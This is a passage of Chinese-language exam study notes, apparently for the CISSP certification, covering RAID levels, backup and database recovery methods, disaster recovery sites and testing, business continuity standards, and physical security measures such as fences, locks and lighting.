盘,因为所有的磁盘可以并行访问。然而,如果没有奇偶校验信息,不提供冗余,就不可能从 硬盘故障中恢复过来。它不能用在高可用性要求的系统上,但它代表了最快的磁盘阵列。 ②RAID-l,也被称为镜像 mirroring。它使用两个磁盘,并含有相同的数据信息。如果一 个磁盘损坏,另一个磁盘仍含有数据。提供容错。这个级别的所有写入磁盘,并从一个磁盘复 制到另一个,创建了两个镜像的驱动器。这种技术也被称为数据镜像。它提供了冗余,当一个 硬盘驱动器失败时,另一个是可用的。RAID 1 是非常昂贵的,从驱动器的空间的角度来看, 有一半的空间用来做磁盘的镜像了。 —209— ③RAID-2,这是理论的 RAID 级别,实际上没有应用,反正很复杂。 ④RAID 3 和 4(0 加校验;1 加校验),使用 3 个以上的硬盘,基于 RAID-0 的条带化,增 加额外的奇偶校检信息,来实现冗余容错,如果一个数据磁盘失败,还可以重建磁盘的信息。 其中,RAID 3 的磁盘空间利用更高,但 RAID 4 的速度更快。在这两种情况下,都有一个硬盘 是单独存储奇偶校检信息的,它可能成为速度的瓶颈,也是一个单点故障点。(1 或 0 加上一 个校验盘) ⑤RAID-5,也叫做奇偶校验 striping with parity。它使用 3 个或多个磁盘,相当于一 个磁盘,其中包含奇偶校验信息。如果单一磁盘损坏,则磁盘阵列将继续运行,但速度会变慢。 这一级别需要三个或更多个驱动器来实现,类似于 RAID4,但不使用专用的奇偶校验硬盘,数 据和奇偶校验信息是在存在所有驱动器上的。这种阵列是最流行的,可以容忍任何一个驱动器 的损失。 ⑥RAID 6,使用两组奇偶校验信息,可容忍 2 个硬盘同时故障,并不常用。 ⑦RAID-10,也被称为 RAID 1+0、RAID 0+1 或条带镜像 stripe of mirrors。是在条带(RAID-0) 配置上再配置两个或者两个以上的镜像(RAID-l)。它使用至少 4 个磁盘,但可以支持更多的, 磁盘可添加数应为偶数。即使多个磁盘损坏,只要在每个镜像中至少有一个驱动器继续运行, 它就能继续运行。在一般情况下,RAID 1+0 全面优于 RAID 0+1,无论是在速度和冗余。 ⑧RAID 15,(镜像奇偶校验集合,即 RAID 1 然后 RAID 5)/(奇偶校验镜像磁盘组,即 RAID 5 然后 RAID1)。这是极端的容错,磁盘空间效率低。 要理解:容错与备份是不同的概念。奇偶检验使用的技术是汉明编码(Hamming Coee)。 2.独立磁带冗余阵列 RAIT Redundant Array of independent Tapes 磁带媒体也可提供冗余。这被称为独立磁带冗余阵列(RAIT)。一个 RAIT 是机制自动转存 和驱动机制之间的磁带设备。RAIT 利用条带,但是没有冗余。这也是常见的使用磁带进行备 —210— 份和恢复的多个副本。类似于 RAID,只不过有磁盘变成磁带。 其它的技术还有: 3.大规模非活动磁盘阵列 Massive Array of Inactive Disks (MAID) 是只有处于活动状态的磁盘驱动器才会在某一特定时间内启动的一项存储技术。大规模非 活动磁盘阵列在减少电能消耗的同时延长了驱动的使用寿命。 4.数据库恢复 Database Recovery 创建远程数据库内容备份有 3 种主要技术手段:电子链接、远程日志处理和远程镜像。 ①电子链接/电子传送 Electronic Vaulting(不是实时同步的/1 天 1 次) 数据库备份通过定时周期性的、批量传送的方式备份到远处的一个场所。如果你使用了电 子链接,那么需要记住的是,从宣布灾难开始到数据库准备好当前的数据准备运营,可能存在 着相当大的时间延迟。如果你决定启用恢复站点,技术人员需要从电子链接中检索到适当的备 份数据,并应用到恢复站点中即将投入使用的生产服务器上。与供应商签订电子链接合同的时 候,要考虑存储容量、通信链接带宽、定期测试和在灾难发生时检索到保险库数据所需的时间 等各种因素。庞大的数据库是通过其它方式先运输并存储到异地的,再通过链接来访问。 ②电子日志/远程日志处理 Remote Journaling(不是实时同步的/1 小时 1 次/更频繁) 远程日志处理是以一种更加迅速的方式完成数据的传输。数据传输仍然是以批量传输的方 式进行,但是发生的更加频繁,通常每小时一次或者问隔时间更短。与电子链接不一样的是, 在数据库不转移数据文件,只同步日志,备份数据库根据日志自行更新数据。当宣布发生灾难 的时候,技术人员找到合适的事务日志并将其应用于生产数据库。 ③远程镜像 Remote Mirroring(实时的全备份) 远程镜像是最先进的数据库备份解决方案,也是最贵的。远程镜像所使用的技术水平超过 了远程日志处理和电子链接。具体怎么做的,跟日志有什么区别,我不知道。 其实还有其它几种方式: ④磁带传送 tape vaulting 将数据备份到磁带上,然后由一名收发员手动将它们运输到一处异地设施。如果使用自动 磁带传送(tape vaulting)技术,数据通过一条串行线路传送到异地设施的备份磁带系统中。 维护异地设施的公司对这个系统进行维护,并在必要时更换磁带。在需要时,它可以迅速地备 份和检索数据。 5.备份和离站存储 Backups and Offsite Storage 灾难恢复计划(尤其是技术指南) disaster recovery plan 应该完整地说明组织要求的备 份策略。有 3 种备份类型: ①完整备份/全备份 Full Backups。 采用离站存储数据,包括全部关键数据。最有效,最费时。 ②增量备份 Incremental Backups。 基于最近的完全备份或增量备份,再备份已改变的数据。为了确认文件在上次完全备份后 是否有改变,使用归档位(archive bit)标识该文档,即:只复制归档比特被打开、启用或 设置为 1 的文件;一旦增量备份完成,所有被复制的文件的归档比特都会被重置、关闭或设置 为 0。恢复时,先恢复完全备份,再按时间逐个恢复增量备份。 —211— ③差量备份 Differential Backups。/差异备份 基于最近的完全备份,仅备份改变的数据,不改变归档位的值。恢复时,先恢复完全备份, 再恢复差量备份。 ④差量和增量的区别:一是基础,差量基于上次的完全备份,增量不管上次是什么备份; 二是标记,差量不改变归档位,增量改变;三是时间,组合使用完整备份和差异备份,只还原 两个备份,更快;组合使用完整备份和增量备份,需要还原最近的完整备份和所有的增量备份, 更慢。(差完全、增上次) 不能将差量备份和增量备份混杂起来,这种重叠可能造成文件丢失。 6.驱动器和数据存储 包括存储区域网络(SAN)和网络附加存储(NAS)等。其中最常见的故障类型是驱动器故障。 ①SAN 存储区域网络(Storage Area Network ) 一个 SAN 包括专用的块级存储和专用的网络。包括各类存储设备,如磁带库,光盘驱动器 和磁盘阵列。他们利用 iSCSI 协议连接操作系统的本地连接设备,提供了相同的 RAID 水平。 SANS 还提供额外的性能,容量和冗佘选项等。例如,为温站点或热站点提供系统备件,提供 远程异地镜像,等。 ②网络附加存储 NAS(network attached storage) NAS 是一个类似 SAN,但有几个非常重要的区别。NAS 一般设计用于简单存储服务文件, NAS 操作不是块级,而是文件级。常用于 FTP 服务器和其他类型的文件服务器,它们通常映射 为网络驱动器。也可以用来提供跨网络的多个系统的存储。它们也普遍支持相同的 RAID 级别, 在应用程序和数据库软件平台上,也有额外的冗余选项。例如,数据库同步技术可以使用数据 库管理系统在多个位置更新记录。无盘工作站就是通过网络来存储的,就是 NAS,就是网盘。 7.磁盘簇 如果所有这一切需要的是基本的数据存储,那么 just-a-bunch-of-drives(JBOD)配置可 能是最合适的。如果磁盘配置以这种方式,每个磁盘可以单独使用,并彼此隔离。 在这种情况下,数据被存储在离散的磁盘上,而不是存储在多个磁盘上。分区通常存储在 单个磁盘上(而不是跨越多个磁盘)。在某个驱动程序失败的情况下,所有的数据都会被丢失, 但其他驱动器将继续提供。这可能需要使用多个磁盘的一个分区,这称为级联。级联磁盘会出 现操作系统作为一个单一的连续驱动管理。这可能是最合适的,特别大的分区是可取的,但驱 动器故障可能会造成相当大的问题,因为所有的数据在驱动器失败时候将丢失。 K.2 恢复站点策略 1.受信恢复 Trusted Recovery 恢复程序能够保证系统在发生故障或崩溃之后,能够还原因之前的状态。系统可以被预置, 在损坏时能够处于故障防护状态 fail-secure system 或者应急开放状态 fail-open system。 故障防护状态的系统会在故障发生时保持在防护状态,并禁止所有访问;而应急开放状态在发 生故障前保持在开放的状态,并允许所有访问。举个栗子就是,一扇自动门如何停电了,是保 持关闭还是开放呢?这个选择取决于在系统的业务运行重要还是安全更重要。 失效安全和失效开放 Fail-secure and fail-open —212— 应用程序故障时,其代码应被设计成能有效应对一般意义上的失败,有两个基本选择: ①失效安全状态/故障安全机制:置系统于一个高安全级别(甚至完全关闭禁用它)直到管 理员可以诊断问题和恢复系统正常运行。(微软的蓝屏) ②失效开放状态/故障保护控制:允许用户绕过失败的安全控制,忽略错误的发生。 任何系统的恢复过程有两个要素来确保一个可信的解决方案的实施。 一是失败准备。除了备份方案之外,还要有系统恢复及容错的方法。 二是系统恢复的过程。系统应该重新启动,恢复所有受影响的文件和服务,检查所有重要 的安全文件的设置等等。 受信恢复有 4 种类型: ①手动式恢复 Manual Recovery 如果系统崩溃了,系统并没有处于故障防护状态。相反的是,在系统故障或崩溃后,管理 员需要手动执行必要措施,以实现系统恢复。 ②自动式恢复 Automated Recovery(多种故障) 对于至少一种类型的系统故障,系统能够自动执行受信恢复。例如,RAID 硬盘能够恢复 硬盘驱动器故障但是不能恢复整个服务器故障。一些类型的故障需要手动恢复。 ③无过度损失的自动式恢复 Automated Recovery without Undue Loss 这类似于自动式恢复,对于至少一种类型的系统故障,系统能够自动执行恢复过程。然而, 这其中包括一些能够保护特定对象免受损失的机制。无过度损失的自动化恢复的方法包括对数 据及其他对象的恢复。它可能含有其他机制,以恢复受损文件,重建日志数据,并验证密钥系 统和安全组件的完整性。 ④功能恢复 Function Recovery 支持功能恢复的系系能够自动恢复某些特定功能。这种状态能够确保系统成功地完成功能 恢复。否则系统将会回到变更前时的故障防护状态。 2.确定业务单元的优先顺序 Business Unit and Functional Priorities 为了尽可能最有效地恢复你的业务运营,你就必须精心策划你的灾难恢复计划,以至于优 先级别最高的业务单元能被最先恢复。你必须识别和优化重要业务功能,还有你能定义在发生 灾难或错误之后你想恢复哪个功能或者以什么顺序恢复。 第一域的 G.2 章节已经讲过业务影响分析 BIA 了,这里也要用到。大多数单位将 BIA 作为 业务连续性规划过程的一部分,这种分析能够检测漏洞、建立策略来降低风险, 并最终生成 一个BIA报告以描述组织面临的潜在风险并确定重要的商业单元和功能。拥有所有的BIA信息, 便可以使用生成的文件作为优先级任务的基础。 3.可替代的工作站点 Alternate Processing Sites 灾难恢复计划中最重要的要素之一是:在主要的工作站点无法使用的时候,选择可以替代 的工作站点。在灾难恢复计划中经常使用的几类站点有:冷站点、温站点、热站点、移动站点、 服务局(service bureaus)以及多站点。 热站是在线的,其它都是离线的离站。Offsite。 ①冗余站点(rddundant site)冗余场所/镜像站点 地理上分散的两个数据中心,之间热交换或负载平衡,可以完全接替,连人都有备份。 —213— 冗余中心的优势:*很少或没有停机时间、*易于维护、*没有恢复需求 冗余中心的缺点:*更多的费用、*需要冗余的硬件、网络系统和员工、*距离限制 ②内部或者外部热站点(hot site)/完备场所 内部热站点:该站点是准备就绪的,包括所有的技术、设备和应用程序,有实时数据。 外部热站点:与服务商提供签约提供的,与在线站点尽可能接近。在外部热站点上只有硬 件,没有任何应用程序或数据。 内部或外部热站点的优点:*允许测试恢复、*高可用性、*站点快速恢复 内部或外部热站点的缺点:*价格昂贵、*外部站点的硬件和软件兼容性问题 ③温站点或冷站点(warm site/cold site)基本完备场所/基础场所 温站点:有基础设施(空调/电脑/布线/通信),无服务器、无数据(通常 12 小时启用)。 冷站点:空的数据中心空间,只有物理设施,所有设备和技术必须在灾难时购买或获得。 温和冷的网站的优点:*更少的费用、*长期恢复的可用性 温和冷的网站的缺点:*不能立即使用、*没有完整的测试、*只支持部分关键业务恢复 ④移动站点(rolling hot site)滚动完备场所 将数据中心被安置在一个移动拖车或一个标准的海运集装箱中。灾难发生时,将它移动到 另一个有必要的电力、资源和通信的地点继续经营。 移动站点的优势包括:*高可移动性、*模块化、*不需要房间 缺点包括:*冷站点能力有限、*密度和容积升级容量有限、*运输成本高 ⑤互助协议/互惠协议 Mutual Assistance Agreements/ reciprocal agreement 互惠协议(reciprocal agreement)是在组织之间分担彼此风险,帮助对方在空难中恢复 数据和处理。虽然合乎逻辑,但也充满兼容性、竞争保密、性能不足等问题。 联盟是互惠协议的一个变体,也称为相互援助协议(mutual aid agreement),就是多个 组织互相帮助。 ⑥服务局 Service Bureaus(相当于云服务供应商或产品租赁商) 服务局是租借计算机时间的公司。服务局拥有很大的服务器群,并且通常具有大量工作站。 任何组织机构都可以与服务局签署购买合同,以便使用部分处理能力。访问可以是联机的,也 可以是远程的。在发生灾难时,服务局的工作人员通常能够为你的所有 IT 需求提供支持,甚 至工作人员还能够使用台式机。与服务局签署的合同往往包含测试和备份以及响应时间和可用 性。 ⑦外包 为了避免这些问题的互惠协议和建设替代站点的成本,一些组织可以通过服务水平协议 (SLA)选择外包他们的应急行动和灾难恢复。但真出事了,不一定靠谱。 4.集群 集群技术也可以使用,但不是冗余和负载平衡。在集群技术中,双活系统可以随时提供服 务,在一个系统失败的情况下,会降低服务能力。 K.3 多处理站点(例如:运行的冗余系统)(multiple processing center)多处理中心 企业的另一种备份方案,如跨国公司在世界各地都有服务站点,就可以互为备份。这是新 —214— 加的内容,不知道怎么考。 K.4 系统弹性、高可用性、服务质量和容错 系统的弹性、高可用性、服务质量和容错的备件冗余项目被称为在系统中提供容错。就是 容灾备份了。总之:冗余、容错和故障转移功能提高了系统或网络的可靠性;高可靠性可实现 高可用性。 1.容错能力 Fault Tolerance 是指系统在发生故障的情况下,仍然继续运行的能力。容错性是通过添加冗余组件实现的, 如在廉价冗余磁盘阵列(RAID)中的额外磁盘,或在故障转移群集配置中的额外服务器。 2.系统弹性 System Resilience 指的是系统在发生不利事件时保持一个可接受的服务水平能力。这可能是硬件错误,或可 能是其他控制管理的攻击。在某些情况下,它指的是在发生不利事件后,系统的还原能力。 容错能够使得系统故障转移到另外的服务器上,而系统弹性能够保障在原系统修复后,该 集群能够返回原服务器。 3.服务质量 Quality of Service 服务质量(QOS)控制能够保护负载下的数据网络的完整性。许多不同的因素有助于提升 最终用户体验的质量,服务质量对这些要素进行管理,以创造能够满足商业需求的环境。有助 于服务质量提升的一些因素如下: ①宽带 Bandwidth——可供通信的网络容量。 ②延迟 Latency——时间数据包从源到目的地所需要的时间。 ③抖动 Jitter——不同数据包之间的延迟变化。 ④丢包 Packet Loss——数据包可能会在源和目的地之间的传送过程中丢失,需要重传。 ⑤干扰 Interference——电噪声、故障设备等因素可能会损坏数据包的内容。 除了控制这些因素之外,QOS 也会给业务按优先级排序,先保障高级别的业务。 4.高可用性(HA) 高可用性(HA)是保证一些业务始终正常运行的一种技术和流程的结合。具体业务可能是一 个数据库、一个网络、一个应用程序、一个电源等。服务提供商与他们的客户之间有服务水平 协议 SLA,其中概述了它们承诺提供的正常运行时间和当网络无法连接时能够使该服务正常运 转的周转时间。例如,托管公司可以保证互联网连接提供 98%的正常运行时间。这意味着它们 可以保证至少 98%的时间内你在他们那儿购买的互联网连接能够正常启动并运行。为了提供这 种级别的高可用性,托管公司需要有提供冗余、容错和故障转移的技术与过程。 L.实施灾难恢复流程 要实施灾难恢复,先要拟制好灾难恢复计划。怎么写,怎么分发和维持就不说了。 L.1 响应 Emergency Response 灾难恢复计划中包含重要人员在识别出灾难或灾难即将来临时应立即遵守的、简单但内容 全面的指令,还有各种时限要求。要先重点、后一般的按优先级来处置。 —215— L.2 人员 Personnel 发生灾难,首先要评估其破坏与影响,然后立马查看通知清单,通知所有相关的人员立即 处置。有几个小组各司其职:执行应急管理团队、应急管理小组、灾难恢复小组等。 其中:重建团队(restoration team)负责使备用站点投入运行,而救援团队(salvage team) 负责恢复原始站点业务。两个团队必须了解如何完成许多工作,如安装操作系统、配置工作站 和服务器、布置电线和线缆、建立网络和配置网络互联服务、安装设备和应用程序。这两个团 队还必须知道如何在备份设施中恢复数据,以及如何安全地完成各份工作,保证系统和数据的 机密性、完整性和可用性不会遭到破坏。 L.3 通信 Communications 事件的实时态势需要及时通报到各部门、各层级。 L.4 评估 Assessment 当灾难恢复团队到达现场时,他们的首要任务之一就是评估现状。这通常以迭代的方式进 行:第一响应者进行非常简单的评估、分类活动并启动灾难响应。随着事件的发展,更加详细 的评估将去衡量灾难恢复工作的有效性以及资源分配的优先级。一般会先评估确定: ①非事件:这些事件通常是由系统故障或人为错误导致的服务微小或有限中断。一个短周 期的停机时间和不需要备用处理或存储设施。 ②事件:导致整个设施或无效的大量时间服务中断的事件。这些事件需要制定灾难恢复计 划,并向高级管理层报告信息和状态,并可能需要启用危机管理。 ③严重事件:一个关于组织使命,设施和人员的重大破坏或中断:这些事件需要制定的 DR.计划,并可能涉及建设一个新的主要设施。这些事件需要高级管理层报告并启动危机管理。 L.5 恢复 要区分清楚什么是灾难恢复,什么是灾难还原!Recovery vs. Restoration 发生灾难时:恢复是将业务操作和过程还原至工作状态;一支灾难恢复团队被指派恢复主 要业务,在通信领域就是“先代通,后抢修”;灾难恢复团队成员可以操作的时间范围很短, 他们必须尽可能迅速地应用 DRP 和还原 IT 能力。如果灾难恢复团队不能在 MTD/RTO 内还原业 务过程,那么公司就会遭受损失。还原是将业务设施和环境还原至可工作状态。一旦人们相信 原有场所是安全的,那么抢救团队成员就会开始工作,将公司还原至其最初的全部能力,并且 在必要时还原至原始位置。如果原始位置不再存在,那么就需要为公司选择新的地点并还原。 在通信领域就是“抢修后,再还原”。只有在全部的正常操作都返回至被还原的原有场所后, 我们才能宣告紧急状态结束。恢复发生在 RTO 时间,还原发生在 WRT 时间。 L.6 培训与意识 Training, Awareness 培训和文档记录都很重要。别的没什么了。 M.测试灾难恢复计划 有灾难恢复计划 DRP 还不够,必须定期进行测试,测试和灾难恢复演练应当至少每年进行 一次,以确保计划的是可行的并且符合组织机构变化的需要。测试最重要的目的是让人员熟悉 —216— 恢复流程和操作,其次才是验证计划本身。 一般有 5 五种主要的测试类型:通读测试、结构化演练、模拟测试、并行测试和完全中断 测试。就是后面的 M.1 到 M.5 的内容。先了解几个概念: 灾难恢复(DR)Disaster Recovery,从紧急状态恢复服务的过程,目的就是恢复业务。 灾难恢复计划(DRP),是应对突发情况的应急实施计划,关注 IT 和技术问题。 连续性计划(BC)Continuity Plan,提供方法和程序以面对长期的中断和灾难。 业务连续性计划(BCP)Business Continuity Plan,包含 DRP,内容更广泛。这个内容 不在本域,更关注管理方面、流程方面。详见第一域 G 章节。 业务连续性管理(BCM),包含 DRP 和 BCP,提供一个框架,实施管理,形成能力。 有关各种时间的概念,详见 K 和 N 章节。 M.1 核对性测试/检查性测试/通读测试 Read-Through Test/Checklist 通读测试是一种最简单的测试,但也是最重要的一种测试。你只需向灾难恢复团队的成员 分发灾难恢复清单的副本,井要求他们审查清单。这样就允许你同时实现下列三个目标: ①恢复清单确保关键人员意识到他们的职责并定期了解掌握相关知识。 ②恢复清单促进人员审查过时的信息,并根据组织机构的变化更新相关条目。 ③恢复清单能够帮助标识要离职的重要人物,并作出相应的调整。 各自查文档。 M.2 演练性测试/结构化检查/走查 Structured Walk-Through 结构化演练也被称为“桌面练习/桌面演练”table-top exercise/ Tabletop Exercise/Structured Walk-Through Test,简单、成本低。灾难恢复团队的成员聚集在一间 大会议室中,不同的人在灾难发生时扮演不同角色。通常,确切的灾难情景只有主考员知道, 他在会议上向团队成员描述具体的情况。然后,团队成员通过参考他们的灾难恢复计划对特定 的灾难类型进行讨论,进而得出适当的响应办法。 集中推流程。 M.3 模拟测试 Simulation Test 模拟测试与组织演练类似(或战争游戏),也叫排演演练 Walk-Through Drill。相关人员 都集中起来,在特定的模拟环境(场景)中演练灾难恢复,还能提高人员的安全意识。消防演 习是一种常见的模拟测试。模拟测试为灾难恢复团队的成员呈现一个情景并要求他们产生出适 当的响应措施。与前面讨论的测试不同,其中某些响应措施随后会被测试。这种测试可能涉及 到中断非关键的业务活动并使用某些操作人员。 模拟环境搞演练。 M.4 并行测试 Parallel Test 并行测试,也被称为功能测试 Functional drill,利用测试窗口时间在实际的异地备份 站实施实施运行测试,还不能影响业务运营。备份站点的处理结果要与原站点的处理结果进行 —217— 比较,一般商业服务合同包括每年至少有一个星期用于测试。并行测试涉及到将实际人员重新 部署到替换的恢复场所和实现场所启用措施、被重新部署到该场所的员工、以灾难实际发生时 的方式执行他们的灾难恢复职责。唯一的差别在于主要设施的运营不会被中断,这个场所仍然 处理组织机构的日常业务。 不影响业务,另行做测试。 M.5 完全中断测试 Full-Interruption Test 完全中断也称全面测试 Full-ScaleTest,是成本最高、最复杂的测试。实际站点和业务 全部关闭,要求备份站点和恢复过程必须满足准确性、完整性,恢复团队和人员必须具备相应 能力。一般只有在成功进行平行测试,前有督导委员会和高级管理层的授权下进行。完全中断 测试与并行测试的操作方式类似,但涉及到实际关闭主场所的运营并将其转移到恢复场所。出 于很明显的原因,完全中断测试安排起来极其困难,并且你经常会遇到来自管理层的阻挠。 真实系统上的演练。 N.参与业务连续性计划和演练 建立和维护业务连续性计划(BCP)的最关键部分是管理层的支持。 先复习几个重要时间概念(必考): MTD/MTO(最大容忍故障时间 Maximum Tolerable Degradation),时间一到,业务完蛋。 RTO(恢复时间目标 recovery time objective),要采取措施,在领导要求的时间内、 在业务瘫痪前搞定故障,恢复系统。【MTO=RTO+WRT,或 MTO-RTO=WRT】 WRT(工作恢复时间 Work Recovery Time),是整个 MTD 值减去 RTO 的剩余时间,是系统 和技术恢复后,对人员、业务、数据等进行恢复。RTO 通常指使基础设施和系统恢复运行的时 间,而 WRT 指恢复数据、测试流程以及使所有事情“活“过来可以进行生产的时间。 RPO(恢复点目标),可容忍的最大数据丢失量,用中断的最大时间表示,一般都不长。 比如某系统的 RPO 是 5 分钟,持续丢失超过 5 分钟的数据量,业务就完蛋了。 MTBF(平均故障间隔时间,Mean Time between failure),代表了设备稳定运行的寿命, 是指某一台设备的估计寿命,时间到就该换设备了。 MTTR(平均修复时间,to repair),维修恢复故障设备的时间。 灾难恢复的各类时间标准以及运用方法和意义如下图: —218— 1.NIST 800-34 中的业务连续性规划的流程 业务连续性规划中的业务影响分析 BIA 是很重要的内容,在第一域的 G.2 章节已经详述了 相关流程。 NIST800-34 文档是专门针对 IT 的应急计划,当然,它也同样适用于制定企业级的 BCP 和 BCM。所有的团队成员都有义务参加变更控制程序。评审应按 BCP/DRP 策略进行,一般每 3 个 月组织 1 次审查,每年进行 1 次正式审核,或者有任何重大的组织改变的时候。 ①制定业务连续性规划策略声明。——连续性策略,为计划和建立 BCP 的工作提供了框架 和管理,包括:范围、任务、原则、指南和标准。 ②进行业务影响分析(BIA)。——业务影响分析,包括风险评估和资产赋值,流程为: 搞数据收集、定关键业务、定依赖资源、算资源寿命、定漏洞威胁、算业务风险、写分析报告。 ③制定预防性控制方法。——控制措施 ④制定恢复战略。——恢复战略 ⑤制订应急计划。——制定 BCP ⑥测试计划及进行培训和演练。——测试和演练 ⑦维护计划。——维护计划 项目的单个目标必须进行分析,证明计划是有用可行的,确保每一个目标是能够实现的。 即 SWOT 分析,其基本元素包括: *优势 Strengths——项目团队的特点,使其比其他团队具有更大的优势。 *劣势 Weaknesses——相对于其他团队,使该团队处于不利地位的特征。 *机会 Opportunities——可以促进项目成功的元素。 *威胁 Threats——可能促使项目失败的元素。 —219— 2.业务连续性规划 业务连续性规划项目是一个持续的过程,是指本程序的所有任务都需要定期重复,以确保 计划在公司的组织和技术环境下保持当前的现状。其方案提供了在业务中断、组织瘫痪的情况 下,公司的关键职能如何延续。 3.应急管理组织(EMO)/BCP 委员会 EMO 是提供正式的响应过程的管理和现场汇报的团队,用来应对大规模突发事件和提供技 术支持。 4.参与和演练 BCP 的计划工作组开发、实施、并维护公司全部的应急计划。该工作组负责领导和指导相 关行动,协助管理层在组织中断的情况下,实施应急处置和及时恢复。 关键人员有: ①BCP 经理:创建计划,负责进行业务影响分析和风险评估。 ②BCP 协调员:开发、维护、实施业务连续性和灾难恢复方案与策略,懂项目管理。 ③BCP 部门:制定战略恢复计划和连续性计划,并呈审报批。 5.业务连续性计划员 业务连续性计划员是公司的一个联络点,涉及应急计划或应急反应,为了减少混乱、提高 通信效率,实现及时延/恢复组织的整合。 6.关于 BCM 的其它国际标准 ①BS 25999 —220— 英国标准协会(BSI)的业务连续性管理(BCM)标准。BS 标准有两个部分: *25999-1:2006 BCM 业务守则,提供过程、原则、术语体系,即提供业务连续性管理的 相应过程、原则和术语体系的一般指南。 *25999-2:2006 BCM 规范,说明执行目标及审核需求,即细说明执行、运作和增强一个 BCM 系统的目标以及审核需求。 ②ISO/IEC27031:2011 业务连续性的 ICT(信息和通信技术)准备指南。 此标准是 IS0/IEC27000 整个系列标准的一个组成部分。 ③ISO 22301 业务连续性管理体系的国际标准,取代 BS-25999-2。 ④GPG(业务连续性协会的优秀实践指南) BCM 的最佳实践,分为管理实践和技术实践: *管理实践方面:策略和程序管理;在组织文化中嵌入 BCM。 *技术实践方面:理解组织;确定 BCM 战略;制定和实施 BCM 响应;演练、维护和修订。 ⑤DRI 国际协议的业务连续性规划人员专业实践 将业务连续性管理流程分解为以下 10 个部分: *项目启动和管理。 *风险评估和控制。 *业务影响分析。 *业务连续性战略 *应急响应和运作。 *业务连续性规划 *宣传和培训计划。 *业务持续计划演练、审核和维护 *危机沟通。 *与外部代理机构的协调 O.实施和管理物理安全 相关内容看第三域的 K 章节,前面讲的是怎么选址、建楼什么的,这里就讲怎么保护楼。 O.1 周边安全(例如:访问控制和监控) 1.周边/物理的访问控制 Perimeter 在控制对某区域的授权访问时,最常见的一个问题是“混入(piggybacking)”,也就是一 个人通过使用其他人的合法凭证或访问权利来获取未授权访问。 ①屏障/隔离 Barriers 包括自然的和人工的,用于阻碍而或延迟访问;可以隔开入侵者、阻碍入侵者并使得入侵 者保持一段距离。 ②栅栏/围栏 fence 栅栏 fence 是外围设备,包括地上的划线、铁丝网、带刺铁丝网、水泥墙和使用激光、运 动探测仪或热源探测仪的不可见防线等。 3 到 4 英尺高的栅栏可以阻挡偶然的侵犯; 6 到 7 英尺高的栅栏难以攀越,可以阻止大多数入侵者。 8 英尺或更高的栅栏(带有 3 股带刺铁丝网)可以阻挡信心坚定的入侵者(用于监狱)。 ▲丝号和网眼(gauge & mesh) 栅栏金属丝的丝号是指栅栏网眼所使用的金属丝的粗细程度。丝号越小,金属丝的直径越 —221— 大。11 丝号=0.0907 英寸直径;9 丝号=0.1144 英寸直径;6 丝号=0.162 英寸直径。 网眼大小是金属丝之间的最小净距离。一般的网眼大小为 2 英寸、l 英寸和 0.375 英寸。 金属丝越粗,栅栏越难剪断;网眼越小,栅栏越难以爬过或剪断。反正都是数值最小,强 度越大,而且是搭配使用(网眼特别小里,铁丝就没办法粗)。 以下是当前链环栅栏常用的丝号和网眼大小: *安全性极高——0.375 英寸网眼、11 丝号。 *安全性非常高——1 英寸网眼、9 丝号。 *安全性高——1 英寸网眼、11 丝号。 *安全性较高——2 英寸网眼、6 丝号。 *普通行业安全性——2 英寸网眼、9 丝号。 ③十字转门/旋转门 turnstile 每次只可以进一个人,并且只能单向转动,车站经常有这样的门,只出不进。 ④陷井/陷门 mantrap 由保安人员守护的双重门,目的是为了牵制主体,直至其身份得到确认和验证。银行里这 种门挺多的。还有门 gate 和墙壁 walls 就不说了。 大门一般分为以下 4 类: •Ⅰ类住宅用途。 •Ⅱ类商业用途。允许普通大众访问,如公共停车场入口大门、社区大门或私人存储间门。 •Ⅲ类工业用途。限制人员访问,如库房大门就不允许普通大众通行。 •Ⅳ类禁止访问。例如由警卫或电网保护的监狱入口大门。 ⑤PIDAS 栅栏 边界入侵检测和评估系统 PIDAS (perimeter Intrusion Detection and Assessment)是 一种栅栏,其线网上和栅栏底部装有传感器。PIDAS 用于检测入侵者剪断或攀爬栅栏的企图。 如果检测到入侵行为,那么传感器会发出报警。PIDAS 非常敏感,经常会导致误报。 2.照明 Lighting 要让敌明我暗,但不能扰民。美国国家标准和技术研究院(NlST)制定的使用照明的边界保 护标准中规定了关键区域应该是 QQEE 的被照亮区域、也规定了灯柱的间距应当与照明区域的 直径相等。也就是说,如果照亮区域的直径为 40 英尺,那么灯柱的间距同样应当为 40 英尺(无 死角)。 室内亮度标准:5-10 fc; 室外亮度标准:大楼入口 Building entrances:5 fc;走廊 Walkways:1.5 fc;停车场 Parking garages :5 fc;建筑外观 ite landscape 0.5 fc;建筑周边 Areas immediately surrounding the building:1 fc;公路 Roadways:0.5 fc。 室内 5 到 10,室外全是 5 以下。 O.2 内部安全(例如: 陪同要求/参观人员控制、钥匙和锁) 1.内部安全 Internal Security ①锁 Locks —222— 通常在设施的不同区域使用不同形式的钥匙或密码锁。比如:在公用出入口使用钥匙和钥 匙卡;在员工各自独用的入口(如存储柜、文件柜等)使用密码锁。宾馆、高档小区、机关都已 经使用可编程的门禁系统了,或电子访问控制锁 EAC(electronic access control)。 锁的强度分为 3 级(门的 I 类最差,锁的 1 级最好): •1 级商业和工业用途。 •2 级重要的住宅区/次要的商业区。 •3 级居民/消费者消耗物。 锁的类型: •机械锁。机械锁主要分为两类:暗锁和弹簧锁。 暗锁(warded lock)是最基本的挂锁,它具有一个中间插有凹槽的弹簧锁簧,是价格最低 廉的锁,因为它们非常简单,而且很容易被撬开。(锁芯没有弹簧,只有齿凸) 弹簧锁(tumbler lock)的零件更多一些,钥匙插入锁芯,将锁中的金属条推升至正确的高 度,让锁簧滑动到锁定或开锁位置。(弹子锁,最常见的)。弹簧锁也分 3 类:销簧锁(pin tumbler lock)、盘簧锁(wafer tumbler lock,也称为晶圆门锁(disc tumbler lock))和杆锁 •组合锁(combination lock)。需要正确的数字组合开锁(转动轮子)。 •密码锁(cipher lock,也称为可编程锁)没有钥匙,它使用数字键盘。密码锁的性能提升 有 4 种方法: *开门延迟时间。如果门长时间打开,将触发一个报警器,以警示可能有可疑活动。 *密码重置。可以编程的特定号码组合,在紧急情况下用于重置密码。 *万能钥匙。使管理人员能够改变开锁密码。 *被困报警。如果一个人被困在锁外面,他可以通过某个号码组合与保安或警察联系。 ②员工证/胸牌 Badges 员工证、身份证或安全 ID 都是物理身份标识和/或电子访问控制设备的形式。员工证提 供身份验证和授权,通常包括照片、带有编码数据的磁条和个人信息。 ③运动探测仪 Motion Detectors 有很多种: *infrared 红外运动探测仪,对被监控区域红外照明模式的显著变化进行监视。 